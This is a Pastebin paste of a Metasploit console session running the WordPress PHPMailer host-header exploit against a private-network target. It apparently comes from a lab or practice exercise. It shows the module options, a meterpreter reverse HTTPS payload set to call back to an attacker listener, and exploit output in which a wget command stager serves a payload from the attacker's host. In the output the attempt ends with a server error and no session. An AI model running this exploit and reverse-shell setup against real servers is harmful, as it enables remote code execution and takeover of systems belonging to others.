Guest User

Untitled

a guest
Jun 25th, 2018
146
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.93 KB | None | 0 0
  1. msf exploit(unix/webapp/wp_phpmailer_host_header) > show options
  2.  
  3. Module options (exploit/unix/webapp/wp_phpmailer_host_header):
  4.  
  5. Name Current Setting Required Description
  6. ---- --------------- -------- -----------
  7. Proxies no A proxy chain of format type:host:port[,type:host:port][...]
  8. RHOST 192.168.1.181 yes The target address
  9. RPORT 80 yes The target port (TCP)
  10. SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
  11. SRVPORT 8080 yes The local port to listen on.
  12. SSL false no Negotiate SSL/TLS for outgoing connections
  13. SSLCert no Path to a custom SSL certificate (default is randomly generated)
  14. TARGETURI /backup_wordpress yes The base path to the wordpress application
  15. USERNAME john yes WordPress username
  16.  
  17.  
  18. Payload options (linux/x64/meterpreter_reverse_https):
  19.  
  20. Name Current Setting Required Description
  21. ---- --------------- -------- -----------
  22. LHOST 192.168.1.124 yes The local listener hostname
  23. LPORT 8443 yes The local listener port
  24. LURI no The HTTP Path
  25.  
  26.  
  27. Exploit target:
  28.  
  29. Id Name
  30. -- ----
  31. 0 WordPress 4.6 / Exim
  32.  
  33.  
  34. msf exploit(unix/webapp/wp_phpmailer_host_header) >
  35.  
  36. msf exploit(unix/webapp/wp_phpmailer_host_header) > exploit
  37.  
  38. [*] Started HTTPS reverse handler on https://192.168.1.124:8443
  39. [*] Generating wget command stager
  40. [*] Using URL: http://0.0.0.0:8080/iwwfxiim
  41. [*] Local IP: http://192.168.1.124:8080/iwwfxiim
  42. [*] Generating and sending Exim prestager
  43. [-] Exploit aborted due to failure: unexpected-reply: Server returned code 500
  44. [*] Server stopped.
  45. [*] Exploit completed, but no session was created.
  46. msf exploit(unix/webapp/wp_phpmailer_host_header) >
Add Comment
Please, Sign In to add comment